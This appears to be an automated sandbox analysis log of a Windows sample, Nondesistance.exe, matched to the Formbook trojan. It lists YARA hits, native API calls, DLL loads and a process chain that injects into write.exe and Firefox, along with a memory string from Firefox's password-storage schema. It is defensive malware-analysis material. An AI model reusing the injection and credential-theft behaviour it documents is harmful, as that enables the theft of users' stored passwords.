        Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325334E0 NtCreateMutant,LdrInitializeThunk,9_2_325334E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532B90 NtFreeVirtualMemory,LdrInitializeThunk,9_2_32532B90
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532D10 NtQuerySystemInformation,LdrInitializeThunk,9_2_32532D10
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32534260 NtSetContextThread,9_2_32534260
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32534570 NtSuspendThread,9_2_32534570
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532A10 NtWriteFile,9_2_32532A10
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532AC0 NtEnumerateValueKey,9_2_32532AC0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532A80 NtClose,9_2_32532A80
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532AA0 NtQueryInformationFile,9_2_32532AA0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532B10 NtAllocateVirtualMemory,9_2_32532B10
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532B00 NtQueryValueKey,9_2_32532B00
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532B20 NtQueryInformationProcess,9_2_32532B20
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532BC0 NtQueryInformationToken,9_2_32532BC0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532BE0 NtQueryVirtualMemory,9_2_32532BE0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532B80 NtCreateKey,9_2_32532B80
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325338D0 NtGetContextThread,9_2_325338D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325329D0 NtWaitForSingleObject,9_2_325329D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325329F0 NtReadFile,9_2_325329F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532E50 NtCreateSection,9_2_32532E50
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532E00 NtQueueApcThread,9_2_32532E00
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532ED0 NtResumeThread,9_2_32532ED0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532EC0 NtQuerySection,9_2_32532EC0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532E80 NtCreateProcessEx,9_2_32532E80
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532EB0 NtProtectVirtualMemory,9_2_32532EB0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532F00 NtCreateFile,9_2_32532F00
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532F30 NtOpenDirectoryObject,9_2_32532F30
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532FB0 NtSetValueKey,9_2_32532FB0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532C50 NtUnmapViewOfSection,9_2_32532C50
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532C10 NtOpenProcess,9_2_32532C10
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32533C30 NtOpenProcessToken,9_2_32533C30
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532C30 NtMapViewOfSection,9_2_32532C30
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532C20 NtSetInformationFile,9_2_32532C20
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532CD0 NtEnumerateKey,9_2_32532CD0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532CF0 NtDelayExecution,9_2_32532CF0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040310F
        Source: C:\Users\user\Desktop\Nondesistance.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_004048C54_2_004048C5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_004064CB4_2_004064CB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00406CA24_2_00406CA2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324C22459_2_324C2245
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED2EC9_2_324ED2EC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250E3109_2_3250E310
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BF3309_2_325BF330
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F13809_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AE0769_2_325AE076
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250B0D09_2_3250B0D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B70F19_2_325B70F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F00A09_2_324F00A0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3254717A9_2_3254717A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C010E9_2_325C010E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF1139_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D1309_2_3259D130
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C09_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E09_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AD6469_2_325AD646
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325246709_2_32524670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251C6009_2_3251C600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BA6C09_2_325BA6C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BF6F69_2_325BF6F6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FC6E09_2_324FC6E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325736EC9_2_325736EC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325006809_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B67579_2_325B6757
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325027609_2_32502760
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250A7609_2_3250A760
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325004459_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CA5269_2_325CA526
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BF5C99_2_325BF5C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B75C69_2_325B75C6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BEA5B9_2_325BEA5B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BCA139_2_325BCA13
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BFA899_2_325BFA89
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251FAA09_2_3251FAA0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500B109_2_32500B10
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BFB2E9_2_325BFB2E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32574BC09_2_32574BC0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325098709_2_32509870
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B8709_2_3251B870
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E68689_2_324E6868
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BF8729_2_325BF872
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325038009_2_32503800
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325A08359_2_325A0835
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325028C09_2_325028C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B78F39_2_325B78F3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325168829_2_32516882
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325798B29_2_325798B2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324C99E89_2_324C99E8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FE9A09_2_324FE9A0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BE9A69_2_325BE9A6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520E509_2_32520E50
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325A0E6D9_2_325A0E6D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B9ED29_2_325B9ED2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F2EE89_2_324F2EE8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32501EB29_2_32501EB2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B0EAD9_2_325B0EAD
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BFF639_2_325BFF63
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250CF009_2_3250CF00
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B1FC69_2_325B1FC6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32506FE09_2_32506FE0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BEFBF9_2_325BEFBF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AEC4C9_2_325AEC4C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503C609_2_32503C60
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B6C699_2_325B6C69
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BEC609_2_325BEC60
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0C129_2_324F0C12
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250AC209_2_3250AC20
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32518CDF9_2_32518CDF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251FCE09_2_3251FCE0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CACEB9_2_325CACEB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_006080CB10_2_006080CB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_0060E97010_2_0060E970
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00609B6010_2_00609B60
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00609B5710_2_00609B57
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_0062740010_2_00627400
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_006104CB10_2_006104CB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_006104D010_2_006104D0
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00609D8010_2_00609D80
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 10_2_00607E0010_2_00607E00
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: String function: 32535050 appears 32 times
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: String function: 3257EF10 appears 86 times
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: String function: 324EB910 appears 241 times
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: String function: 32547BE4 appears 82 times
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: String function: 3256E692 appears 78 times
        Source: Nondesistance.exeStatic PE information: invalid certificate
        Source: Nondesistance.exe, 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000003.20303958082.0000000032443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20405124824.0000000032790000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000000.20118343290.0000000000448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000003.20300365198.000000003228E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exeBinary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/8@31/16
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040310F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00404352 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404352
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,4_2_0040205E
        Source: C:\Users\user\Desktop\Nondesistance.exeFile created: C:\Users\user\dewaterJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeFile created: C:\Users\user\AppData\Local\Temp\nsq11AE.tmpJump to behavior
        Source: Nondesistance.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Nondesistance.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: write.exe, 0000000B.00000003.20563852231.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20563852231.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25030469735.0000000002E4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Nondesistance.exeReversingLabs: Detection: 50%
        Source: Nondesistance.exeVirustotal: Detection: 56%
        Source: C:\Users\user\Desktop\Nondesistance.exeFile read: C:\Users\user\Desktop\Nondesistance.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: srvcli.dllJump to behavior
